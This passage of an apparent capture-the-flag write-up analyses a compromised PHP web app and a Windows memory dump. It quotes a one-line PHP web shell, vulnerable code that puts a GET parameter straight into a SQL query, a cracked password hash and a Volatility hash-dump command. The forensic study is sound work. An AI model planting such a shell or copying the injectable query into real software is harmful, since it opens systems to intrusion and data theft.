src=\"/static/f24f3d44d13e974bcd420f34b1880ff4/d0c0e/image-20240122142752179.png\"\n            alt=\"image-20240122142752179\"\n            title=\"image-20240122142752179\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"backdoorforensic\" style=\"position:relative;\"><a href=\"#backdoorforensic\" aria-label=\"backdoorforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 
3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>BackDoor(Forensic)</h3>\n<blockquote>\n<p>What is the backdoor file name?</p>\n</blockquote>\n<p>Tracing the sequence of reverse-shell packets shows that a PHP file containing <code class=\"language-text\">&lt;?php echo system(\"$_GET['cmd']\");?></code> was created as <code class=\"language-text\">.621b4CkD0oR.php5</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/efaba067be42fca5e50c60288ce458fe/dcccd/image-20240122143741729.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 36.66666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/efaba067be42fca5e50c60288ce458fe/8ac56/image-20240122143741729.webp 240w,\n/static/efaba067be42fca5e50c60288ce458fe/d3be9/image-20240122143741729.webp 480w,\n/static/efaba067be42fca5e50c60288ce458fe/e46b2/image-20240122143741729.webp 960w,\n/static/efaba067be42fca5e50c60288ce458fe/0b154/image-20240122143741729.webp 1127w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/efaba067be42fca5e50c60288ce458fe/8ff5a/image-20240122143741729.png 
240w,\n/static/efaba067be42fca5e50c60288ce458fe/e85cb/image-20240122143741729.png 480w,\n/static/efaba067be42fca5e50c60288ce458fe/d9199/image-20240122143741729.png 960w,\n/static/efaba067be42fca5e50c60288ce458fe/dcccd/image-20240122143741729.png 1127w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/efaba067be42fca5e50c60288ce458fe/d9199/image-20240122143741729.png\"\n            alt=\"image-20240122143741729\"\n            title=\"image-20240122143741729\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>From that, we can determine that the correct flag is <code class=\"language-text\">KCTF{.621b4CkD0oR.php5}</code>.</p>\n<h3 id=\"backdoor-pathforensic\" style=\"position:relative;\"><a href=\"#backdoor-pathforensic\" aria-label=\"backdoor pathforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>BackDoor Path(Forensic)</h3>\n<blockquote>\n<p>What is the full path of the backdoor in the server?</p>\n</blockquote>\n<p>Here, the path of the backdoor file we confirmed earlier is itself the flag.</p>\n<p><code class=\"language-text\">KCTF{/var/www/html/app/assets/.621b4CkD0oR.php5}</code> is the correct flag.</p>\n<h3 id=\"super-adminforensic\" style=\"position:relative;\"><a 
href=\"#super-adminforensic\" aria-label=\"super adminforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Super Admin(Forensic)</h3>\n<blockquote>\n<p>What is the super admin password in the web application?</p>\n</blockquote>\n<p>Reading the reverse-shell traffic trace shows that a database dump file created with the command <code class=\"language-text\">mysqldump -u db_user -p kctf2021 > backup.sql</code> was stolen.</p>\n<p>This appears to match the dump file provided as an attachment.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/186a1987df6444e9108b783f6becfdda/58354/image-20240122151507889.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 24.583333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAfUlEQVQY05XPsRLCIBBFUf7/KzUGJhOQXSUwsDujPrawsYmnonlccDnnaJiZiEo56jHVWksprTURGWOoyOuH27bNe4/xvscQwt0wPyClhAux7L0P8z3gRhV1ZOWZZUbt/Q9HlBG8TNdlua2rjymicGr8tOcB+vhzM6p6ZvwBPw8hXsjs4osAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              
srcset=\"/static/186a1987df6444e9108b783f6becfdda/8ac56/image-20240122151507889.webp 240w,\n/static/186a1987df6444e9108b783f6becfdda/d3be9/image-20240122151507889.webp 480w,\n/static/186a1987df6444e9108b783f6becfdda/e46b2/image-20240122151507889.webp 960w,\n/static/186a1987df6444e9108b783f6becfdda/29105/image-20240122151507889.webp 1396w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/186a1987df6444e9108b783f6becfdda/8ff5a/image-20240122151507889.png 240w,\n/static/186a1987df6444e9108b783f6becfdda/e85cb/image-20240122151507889.png 480w,\n/static/186a1987df6444e9108b783f6becfdda/d9199/image-20240122151507889.png 960w,\n/static/186a1987df6444e9108b783f6becfdda/58354/image-20240122151507889.png 1396w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/186a1987df6444e9108b783f6becfdda/d9199/image-20240122151507889.png\"\n            alt=\"image-20240122151507889\"\n            title=\"image-20240122151507889\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Using a convenient online tool to analyze the hash <code class=\"language-text\">5f27f7648285dec7954f5ee1ad696841</code> reveals that the password is <code class=\"language-text\">letmeinroot</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/ab2a89b6dd21546bac34b3faf41f08f9/acd79/image-20240122151613025.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    
class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 12.916666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAIAAAAcOLh5AAAACXBIWXMAAAsTAAALEwEAmpwYAAAAaElEQVQI12MQq1onWbNeuHKdQAUQrRWEIYHyNUhotSAMCYDQKhCqWM3Qvml3x+Y9bZt2t2zZ27Zlb/uWPUDUthkLat+8uw2BdrVv2c1w/9nNh89uPXx2+8mr+89ePSAO3X/68t7L148AtY103G9sNd0AAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/ab2a89b6dd21546bac34b3faf41f08f9/8ac56/image-20240122151613025.webp 240w,\n/static/ab2a89b6dd21546bac34b3faf41f08f9/d3be9/image-20240122151613025.webp 480w,\n/static/ab2a89b6dd21546bac34b3faf41f08f9/e46b2/image-20240122151613025.webp 960w,\n/static/ab2a89b6dd21546bac34b3faf41f08f9/f992d/image-20240122151613025.webp 1440w,\n/static/ab2a89b6dd21546bac34b3faf41f08f9/bb338/image-20240122151613025.webp 1543w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/ab2a89b6dd21546bac34b3faf41f08f9/8ff5a/image-20240122151613025.png 240w,\n/static/ab2a89b6dd21546bac34b3faf41f08f9/e85cb/image-20240122151613025.png 480w,\n/static/ab2a89b6dd21546bac34b3faf41f08f9/d9199/image-20240122151613025.png 960w,\n/static/ab2a89b6dd21546bac34b3faf41f08f9/07a9c/image-20240122151613025.png 1440w,\n/static/ab2a89b6dd21546bac34b3faf41f08f9/acd79/image-20240122151613025.png 1543w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/ab2a89b6dd21546bac34b3faf41f08f9/d9199/image-20240122151613025.png\"\n            alt=\"image-20240122151613025\"\n            title=\"image-20240122151613025\"\n            loading=\"lazy\"\n            
style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The correct flag was <code class=\"language-text\">KCTF{letmeinroot}</code>.</p>\n<h3 id=\"admin-flagforensic\" style=\"position:relative;\"><a href=\"#admin-flagforensic\" aria-label=\"admin flagforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Admin Flag(Forensic)</h3>\n<blockquote>\n<p>Can you find the Admin Flag of the web server?</p>\n</blockquote>\n<p>Looking at the HTTP objects, we can see that a file called <code class=\"language-text\">app_bak.zip</code> was stolen.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 545px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/9c03071567e825e821f760d52423477b/3ddad/image-20240122151816621.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 12.5%; position: relative; bottom: 0; left: 0; background-image: 
url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAIAAAAcOLh5AAAACXBIWXMAAAsTAAALEwEAmpwYAAAAj0lEQVQI103LsQ6DIBSFYV/HS5kMBLiIDJJSaEodcAFr0vb9n6FEl37jn3M6zjlqPRqjEBlj/KC1Nqa1kf9jTEiJiMMwtME0TV1bpPR8f745Z0R1ynndX/u2beHmhRBnlFK2Qyn1kdKyLLWWjhBQCmMI1lpKLwCk8VcfQvDejwp76MkBACilzrl7jG6eY4w/ssIsI3Nw+WwAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/9c03071567e825e821f760d52423477b/8ac56/image-20240122151816621.webp 240w,\n/static/9c03071567e825e821f760d52423477b/d3be9/image-20240122151816621.webp 480w,\n/static/9c03071567e825e821f760d52423477b/6305f/image-20240122151816621.webp 545w\"\n              sizes=\"(max-width: 545px) 100vw, 545px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/9c03071567e825e821f760d52423477b/8ff5a/image-20240122151816621.png 240w,\n/static/9c03071567e825e821f760d52423477b/e85cb/image-20240122151816621.png 480w,\n/static/9c03071567e825e821f760d52423477b/3ddad/image-20240122151816621.png 545w\"\n            sizes=\"(max-width: 545px) 100vw, 545px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/9c03071567e825e821f760d52423477b/3ddad/image-20240122151816621.png\"\n            alt=\"image-20240122151816621\"\n            title=\"image-20240122151816621\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>After extracting it, we can find code that checks whether the user has the root role.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 639px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    
href=\"/static/92b6a6e45153ae6a6b02dd954894e93f/738b8/image-20240122152026973.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 22.083333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAiUlEQVQI13WO2wqDMBBE/ZDqZm/ZZDG1gqAPgb71/z+pqbalCIV5GBgOczqNFkIg4jzO2U3NZbyxRiUmIoC+H4bfXD4FADozR2w4lpxrrev9sWx1ncpcrtvki3sWTcKu0nKUrGxCL/j9jNiuVFkZjULbTDgdUT7B/oWjpQYLk8Y0AO5KcFL9p/0EjrMhoKp4jN4AAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/92b6a6e45153ae6a6b02dd954894e93f/8ac56/image-20240122152026973.webp 240w,\n/static/92b6a6e45153ae6a6b02dd954894e93f/d3be9/image-20240122152026973.webp 480w,\n/static/92b6a6e45153ae6a6b02dd954894e93f/d95e5/image-20240122152026973.webp 639w\"\n              sizes=\"(max-width: 639px) 100vw, 639px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/92b6a6e45153ae6a6b02dd954894e93f/8ff5a/image-20240122152026973.png 240w,\n/static/92b6a6e45153ae6a6b02dd954894e93f/e85cb/image-20240122152026973.png 480w,\n/static/92b6a6e45153ae6a6b02dd954894e93f/738b8/image-20240122152026973.png 639w\"\n            sizes=\"(max-width: 639px) 100vw, 639px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/92b6a6e45153ae6a6b02dd954894e93f/738b8/image-20240122152026973.png\"\n            alt=\"image-20240122152026973\"\n            title=\"image-20240122152026973\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>That did not work as a flag directly, 
so I ran it through CyberChef Magic and identified it as a Base85-encoded flag.</p>\n<p><img src=\"/static/d2e8dcf9cde152f957c0916021375da5/d9199/image-20240122152127751.png\" alt=\"image-20240122152127751\" /></p>\n<p>The correct flag was <code class=\"language-text\">KCTF{y0U_G0t_tHe_AdMin_Fl4g}</code>.</p>\n<h3 id=\"vulnforensic\" style=\"position:relative;\">Vuln(Forensic)</h3>\n<blockquote>\n<p>What was the vulnerability on the edit task page &#x26; what parameter was vulnerable?</p>\n</blockquote>\n<p>Looking at the packets, we can see repeated attacks against <code class=\"language-text\">process_edit_task.php</code> that appear to be SQL injection.</p>\n<p><img src=\"/static/386e27cc56c6baad2008acee071585af/d9199/image-20240123213707514.png\" alt=\"image-20240123213707514\" /></p>\n<p>Looking at the source code of the application downloaded earlier, we can see code like the following: if <code class=\"language-text\">taskId</code> is present in the GET request, its value is concatenated straight into the SQL query string and executed, with no escaping or parameter binding (unlike the POST parameters, which at least go through <code class=\"language-text\">mysqli_real_escape_string</code>).</p>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"><span class=\"token php language-php\"><span class=\"token delimiter important\">&lt;?php</span> \n<span class=\"token function\">session_start</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token keyword\">include</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"../models/db.php\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token keyword\">if</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'taskId'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">{</span>\n    <span class=\"token variable\">$uuid</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'taskId'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token variable\">$sql</span> <span class=\"token operator\">=</span> <span class=\"token 
string double-quoted-string\">\"SELECT * FROM `tasks` WHERE `uuid` = <span class=\"token interpolation\"><span class=\"token variable\">$uuid</span></span>\"</span><span class=\"token punctuation\">;</span>\n    <span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$conn</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$sql</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">if</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'update_task_btn'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">if</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'taskDescription'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;&amp;</span> <span class=\"token keyword\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'taskStatus'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token 
punctuation\">{</span>\n        <span class=\"token variable\">$taskDescription</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$conn</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'taskDescription'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token variable\">$taskStatus</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$conn</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'taskStatus'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n        <span class=\"token variable\">$sql</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"UPDATE `tasks` SET `task_desc` = '<span class=\"token interpolation\"><span class=\"token variable\">$taskDescription</span></span>', `task_status` = '<span class=\"token interpolation\"><span class=\"token variable\">$taskStatus</span></span>' WHERE `uuid` = <span class=\"token interpolation\"><span class=\"token variable\">$uuid</span></span>\"</span><span class=\"token punctuation\">;</span>\n        <span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$conn</span><span class=\"token punctuation\">,</span> <span 
class=\"token variable\">$sql</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token keyword\">if</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$result</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">{</span>\n            <span class=\"token keyword\">echo</span> <span class=\"token string double-quoted-string\">\"Task Updated Successfully. Redirecting...\"</span><span class=\"token punctuation\">;</span>\n            <span class=\"token function\">header</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"refresh:2; url=../views/tasks.php\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token punctuation\">}</span><span class=\"token keyword\">else</span><span class=\"token punctuation\">{</span>\n            <span class=\"token keyword\">echo</span> <span class=\"token string double-quoted-string\">\"Unknown Error. 
Please contact admin.\"</span><span class=\"token punctuation\">;</span>\n            <span class=\"token keyword\">die</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token punctuation\">}</span>\n    <span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">}</span>\n<span class=\"token delimiter important\">?></span></span></code></pre></div>\n<p>Therefore, the correct flag is <code class=\"language-text\">KCTF{sqli_taskId}</code>.</p>\n<h3 id=\"famous-tool-2forensic\" style=\"position:relative;\">Famous Tool 2(Forensic)</h3>\n<blockquote>\n<p>What tool did the attacker use to identify the vulnerability of edit task page?\nFlag Format: KCTF{toolname/version}</p>\n</blockquote>\n<p>As is immediately visible in the packets carrying the SQLi requests, <code class=\"language-text\">KCTF{sqlmap/1.7.10#stable}</code> is the correct flag.</p>\n<h3 id=\"something-interestingforensic\" style=\"position:relative;\">Something Interesting(Forensic)</h3>\n<blockquote>\n<p>There’s something interesting. Can you find it?\nFlag Format: KCTF{fl4G}</p>\n</blockquote>\n<p>I couldn’t figure it out because the hint in the prompt was too sparse, but apparently the correct flag was obtained by decoding the ROT47-encoded string in <code class=\"language-text\">backup.sql</code>.</p>\n<h3 id=\"hidden-pageforensic\" style=\"position:relative;\">Hidden Page(Forensic)</h3>\n<blockquote>\n<p>There was a hidden page which was only accessible to root &#x26; was removed from the web app for security purpose. Can you find it?</p>\n</blockquote>\n<p>Reading the application code reveals that there is a page called <code class=\"language-text\">terminal-13337.php</code> that is accessible only to the root user.</p>\n<p><img src=\"/static/614c4ac19f86c63a86987db814705a7d/a1253/image-20240123214423979.png\" alt=\"image-20240123214423979\" /></p>\n<p>Therefore, <code class=\"language-text\">KCTF{terminal-13337.php}</code> is the correct flag.</p>\n<h3 id=\"db-detailsforensic\" style=\"position:relative;\">DB Details(Forensic)</h3>\n<blockquote>\n<p>What is the database username &#x26; databasename?</p>\n</blockquote>\n<p>You can tell this one just by reading the code.</p>\n<p>Since it was one of the later questions, maybe it was just a giveaway challenge.</p>\n<p><img src=\"/static/63b1529094141b2b3ddad3c440fc46b3/99272/image-20240123214615234.png\" alt=\"image-20240123214615234\" /></p>\n<h3 id=\"api-keyforensic\" style=\"position:relative;\">API Key(Forensic)</h3>\n<blockquote>\n<p>What’s the API Key?\nFlag Format: KCTF{API-KEY}</p>\n</blockquote>\n<p>Same as above.</p>\n<p>Even though it was the last question, it may have been the easiest.</p>\n<h2 id=\"digital-forensics\" style=\"position:relative;\">Digital Forensics</h2>\n<h3 id=\"osforensic\" style=\"position:relative;\">OS(Forensic)</h3>\n<blockquote>\n<p>My boss, Muhammad, sent me this dump file of a memory. He told me that this OS has a malware virus that runs automatically. I need to find some more information about this OS, and the hacker also created some files in this OS. He gave me a task to solve this within 24 hours. I am afraid. Will you please help me? My boss sent some questions; please solve them on my behalf. There are total 7 challenges in this series. 
Best of luck.</p>\n<p>What is the OS version?</p>\n<p>Flag Format: KCTF{1.1.1111.11111}</p>\n</blockquote>\n<p>This challenge asked us to identify the OS version from the provided Windows dump file.</p>\n<p>The flag was <code class=\"language-text\">KCTF{7.1.7601.24214}</code>, which matches the version information shown by WinDbg’s <code class=\"language-text\">!analyze -v</code>.</p>\n<p><img src=\"/static/681e54b18e24b0255358208ac709a2b5/bb630/image-20240121185136134.png\" alt=\"image-20240121185136134\" /></p>\n<h3 id=\"passwordforensic\" style=\"position:relative;\">Password(Forensic)</h3>\n<blockquote>\n<p>What is the login password of the OS?</p>\n</blockquote>\n<p>It looks like we just need to obtain the OS login password from the memory dump under analysis.</p>\n<p>You could combine WinDbg commands and extract it from the registry information, but that is a hassle, so I used Volatility instead.</p>\n<p>I used the command <code class=\"language-text\">vol3 -f KnightSquad.DMP windows.hashdump</code> in a REMNux environment.</p>\n<p><img src=\"/static/cd9ac638ab7c70f69c0a339ada2c5289/d9199/image-20240123215721932.png\" alt=\"image-20240123215721932\" /></p>\n<p>From this, I could determine that the password for the user <code class=\"language-text\">siam</code> was <code class=\"language-text\">squad</code>.</p>\n<p><img src=\"/static/b9a966b06082e3f704da0b91653d162b/cc097/image-20240123215846068.png\" alt=\"image-20240123215846068\" /></p>\n<p>The correct flag is <code class=\"language-text\">KCTF{squad}</code>.</p>\n<h3 id=\"ip-addrforensic\" style=\"position:relative;\">IP Addr(Forensic)</h3>\n<blockquote>\n<p>What is the IP address of this system?</p>\n</blockquote>\n<p>This challenge asks for the system’s IP address.</p>\n<p>This one was also easier to solve with Volatility.</p>\n<p>I used <code class=\"language-text\">vol3 -f KnightSquad.DMP windows.netscan</code> to roughly inspect the local addresses.</p>\n<p><img src=\"/static/1cf93f32306462b6e5b15e69d7d95216/d9199/image-20240123220410862.png\" alt=\"image-20240123220410862\" /></p>\n<p>This let me determine 
that the correct flag is <code class=\"language-text\">KCTF{10.0.2.15}</code>.</p>\n<h3 id=\"noteforensic\" style=\"position:relative;\"><a href=\"#noteforensic\" aria-label=\"noteforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Note(Forensic)</h3>\n<blockquote>\n<p>My boss has written something in the text file. Could you please help me find it?</p>\n</blockquote>\n<p>Next, it seems the challenge asks us to recover information written in a text file.</p>\n<p>This also looked easier to solve with Volatility.</p>\n<p>First, I collected file objects with the command <code class=\"language-text\">vol3 -f KnightSquad.DMP windows.filescan.FileScan</code>.</p>\n<p>Grepping the results showed that the following three text files seem to exist under the user profile.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 705px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/464c04d3c0afca1ca1de6aaedaacf282/d2cbc/image-20240123221213052.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 